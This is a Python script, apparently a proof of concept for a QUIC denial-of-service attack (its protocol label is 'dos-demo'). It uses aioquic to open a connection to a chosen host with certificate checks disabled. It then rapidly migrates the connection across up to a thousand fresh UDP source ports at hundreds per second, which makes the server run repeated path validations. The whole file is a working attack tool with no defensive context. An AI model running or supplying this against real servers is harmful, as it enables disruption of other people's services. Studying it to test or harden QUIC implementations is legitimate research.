import argparse
import selectors
import socket
import ssl
import time

from aioquic.quic.configuration import QuicConfiguration
from aioquic.quic.connection import QuicConnection
from aioquic.quic.events import (
    HandshakeCompleted,
    ConnectionTerminated,
)


def now():
    return time.monotonic()


def make_socket(local_ip, local_port, remote):
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.setblocking(False)
    s.bind((local_ip, local_port))
    s.connect(remote)
    return s


def send_pending(quic, sock):
    """
    Drain all QUIC datagrams currently ready and send them
    through exactly this UDP socket.
    """
    count = 0

    for data, addr in quic.datagrams_to_send(now=now()):
        try:
            sock.send(data)
            count += 1
        except BlockingIOError:
            pass

    return count


def process_events(quic):
    connected = False
    terminated = False

    while True:
        event = quic.next_event()

        if event is None:
            break

        if isinstance(event, HandshakeCompleted):
            connected = True

        elif isinstance(event, ConnectionTerminated):
            print(
                "QUIC terminated:",
                event.error_code,
                event.reason_phrase
            )
            terminated = True

    return connected, terminated


def main(
    host,
    port,
    local_ip,
    start_port,
    migrations,
    rate
):
    remote = (host, port)

    configuration = QuicConfiguration(
        is_client=True,
        alpn_protocols=["dos-demo"],
    )

    configuration.verify_mode = ssl.CERT_NONE

    quic = QuicConnection(configuration=configuration)

    selector = selectors.DefaultSelector()

    #
    # Initial path / initial UDP port
    #
    initial_sock = make_socket(
        local_ip,
        start_port,
        remote
    )

    selector.register(initial_sock, selectors.EVENT_READ)

    sockets = {
        initial_sock.fileno(): {
            "sock": initial_sock,
            "port": start_port,
            "created": now(),
        }
    }

    current_sock = initial_sock

    print(
        f"Connecting QUIC from "
        f"{local_ip}:{start_port} "
        f"to {host}:{port}"
    )

    quic.connect(remote, now=now())

    send_pending(quic, initial_sock)

    #
    # Complete handshake.
    #
    handshake_done = False

    deadline = now() + 5.0

    while not handshake_done:
        if now() > deadline:
            raise RuntimeError("QUIC handshake timeout")

        timeout = 0.01

        timer = quic.get_timer()

        if timer is not None:
            timeout = max(
                0,
                min(timeout, timer - now())
            )

        events = selector.select(timeout)

        for key, mask in events:
            sock = key.fileobj

            try:
                data = sock.recv(65535)
            except BlockingIOError:
                continue

            quic.receive_datagram(
                data,
                remote,
                now=now()
            )

            #
            # IMPORTANT:
            # replies generated by this received packet
            # go back through the SAME local UDP socket.
            #
            send_pending(quic, sock)

            connected, terminated = process_events(quic)

            if connected:
                handshake_done = True

            if terminated:
                raise RuntimeError(
                    "Connection terminated during handshake"
                )

        timer = quic.get_timer()

        if timer is not None and timer <= now():
            quic.handle_timer(now=now())
            send_pending(quic, current_sock)

    print("Handshake complete")

    #
    # Send an initial PING and allow ACKs to settle.
    #
    quic.send_ping(0)
    send_pending(quic, initial_sock)

    settle_until = now() + 0.1

    while now() < settle_until:
        events = selector.select(0.001)

        for key, mask in events:
            sock = key.fileobj

            try:
                data = sock.recv(65535)
            except BlockingIOError:
                continue

            quic.receive_datagram(
                data,
                remote,
                now=now()
            )

            send_pending(quic, sock)
            process_events(quic)

    #
    # Migration phase
    #
    interval = 1.0 / rate
    next_migration = now()

    successful = 0
    attempted = 0

    experiment_start = now()

    #
    # Keep previous ports alive for replies / PATH_CHALLENGE.
    #
    socket_grace = 0.250

    next_port = start_port + 1
    final_port = start_port + migrations

    while next_port <= final_port:

        t = now()

        #
        # Process responses on ALL still-live ports.
        #
        events = selector.select(0)

        for key, mask in events:
            rx_sock = key.fileobj

            try:
                while True:
                    data = rx_sock.recv(65535)

                    quic.receive_datagram(
                        data,
                        remote,
                        now=now()
                    )

                    #
                    # Critical:
                    # PATH_RESPONSE is emitted from the same
                    # source port which received PATH_CHALLENGE.
                    #
                    send_pending(quic, rx_sock)

                    connected, terminated = process_events(quic)

                    if terminated:
                        raise RuntimeError(
                            "QUIC connection terminated"
                        )

            except BlockingIOError:
                pass

        #
        # QUIC timer processing.
        #
        timer = quic.get_timer()

        if timer is not None and timer <= t:
            quic.handle_timer(now=t)

            send_pending(quic, current_sock)
            process_events(quic)

        #
        # Time for next migration?
        #
        if t < next_migration:
            time.sleep(
                min(
                    next_migration - t,
                    0.0002
                )
            )
            continue

        attempted += 1

        #
        # Create NEW local port.
        #
        new_sock = make_socket(
            local_ip,
            next_port,
            remote
        )

        selector.register(
            new_sock,
            selectors.EVENT_READ
        )

        sockets[new_sock.fileno()] = {
            "sock": new_sock,
            "port": next_port,
            "created": now(),
        }

        current_sock = new_sock

        #
        # Queue a genuine QUIC PING.
        #
        quic.send_ping(attempted)

        #
        # IMPORTANT:
        # Send the QUIC packet through NEW source port.
        #
        sent = send_pending(
            quic,
            new_sock
        )

        if sent > 0:
            successful += 1

        if successful % 100 == 0 and successful > 0:
            elapsed = now() - experiment_start

            print(
                f"{successful} ports transmitted, "
                f"current={next_port}, "
                f"rate={successful / elapsed:.1f}/s"
            )

        #
        # Remove sufficiently old sockets.
        #
        cutoff = now() - socket_grace

        for fd, info in list(sockets.items()):

            sock = info["sock"]

            if sock is current_sock:
                continue

            if info["created"] < cutoff:
                try:
                    selector.unregister(sock)
                except Exception:
                    pass

                sock.close()
                del sockets[fd]

        next_port += 1
        next_migration += interval

    #
    # Keep ports alive briefly so final PATH_CHALLENGE /
    # ACK packets can be handled.
    #
    finish = now() + 1.0

    while now() < finish:

        events = selector.select(0.001)

        for key, mask in events:
            rx_sock = key.fileobj

            try:
                data = rx_sock.recv(65535)
            except BlockingIOError:
                continue

            quic.receive_datagram(
                data,
                remote,
                now=now()
            )

            send_pending(quic, rx_sock)

            connected, terminated = process_events(quic)

            if terminated:
                break

        timer = quic.get_timer()

        if timer is not None and timer <= now():
            quic.handle_timer(now=now())
            send_pending(quic, current_sock)

    elapsed = now() - experiment_start

    print()
    print("Attempted migrations :", attempted)
    print("Packets actually sent:", successful)
    print(f"Elapsed              : {elapsed:.3f}s")
    print(
        f"Actual source-port rate: "
        f"{successful / elapsed:.1f}/s"
    )

    for info in sockets.values():
        info["sock"].close()


if __name__ == "__main__":
    parser = argparse.ArgumentParser()

    parser.add_argument("--host", required=True)
    parser.add_argument("--port", type=int, default=4444)
    parser.add_argument("--client-ip", required=True)

    parser.add_argument(
        "--start-port",
        type=int,
        default=35500
    )

    parser.add_argument(
        "--migrations",
        type=int,
        default=1000
    )

    parser.add_argument(
        "--rate",
        type=float,
        default=500
    )

    args = parser.parse_args()

    main(
        args.host,
        args.port,
        args.client_ip,
        args.start_port,
        args.migrations,
        args.rate
    )
